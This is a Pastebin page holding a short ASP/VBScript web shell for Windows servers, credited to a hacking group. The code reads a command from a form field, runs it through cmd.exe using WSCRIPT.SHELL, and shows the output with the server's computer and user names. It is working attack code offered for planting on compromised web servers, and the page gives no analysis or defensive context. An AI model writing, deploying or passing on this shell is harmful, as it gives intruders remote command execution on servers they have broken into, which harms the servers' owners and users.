Advertisement
CYBERSERKERS

Simple Command Web5Hell For Windows

Jan 22nd, 2016
152
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 1.60 KB | None | 0 0
  1. <%@ Language=VBScript %>
  2. <%
  3.  ' --------------------o0o--------------------
  4.  ' Simple CMD Shell By AZZATSSINS CYBERSERKERS
  5.  ' OS: Windows 2000, 4.0 NT
  6.  ' -------------------------------------------
  7.  
  8.  Dim oScript
  9.  Dim oScriptNet
  10.  Dim oFileSys, oFile
  11.  Dim szCMD, szTempFile
  12.  
  13.  On Error Resume Next
  14.  
  15.  ' -- create the COM objects that we will be using -- '
  16.  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  17.  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  18.  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
  19.  
  20.  ' -- check for a command that we have posted -- '
  21.  szCMD = Request.Form(".CMD")
  22.  If (szCMD <> "") Then
  23.  
  24.     ' -- Use a poor man's pipe ... a temp file -- '
  25.     szTempFile = "C:\" & oFileSys.GetTempName( )
  26.    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
  27.    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
  28.  
  29.  End If
  30.  
  31. %>
  32. <HTML>
  33. <title>Simple CMD WebShell</title>
  34. <BODY BGCOLOR=SILVER>
  35. <center>
  36. <img src=http://azzat.wap.mu/files/1049320/az-bn-idb.png width=100px height=90><br>
  37. <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
  38. <input type=text name=".CMD" size=45 value="<%= szCMD %>">
  39. <input type=submit value="Run">
  40. </FORM>
  41. <PRE>
  42. <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
  43. <br>
  44. <%
  45.  If (IsObject(oFile)) Then
  46.    ' -- Read the output from our command and remove the temp file -- '
  47.    On Error Resume Next
  48.    Response.Write Server.HTMLEncode(oFile.ReadAll)
  49.    oFile.Close
  50.    Call oFileSys.DeleteFile(szTempFile, True)
  51.  End If
  52. %>
  53. </center></BODY>
  54. </HTML>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement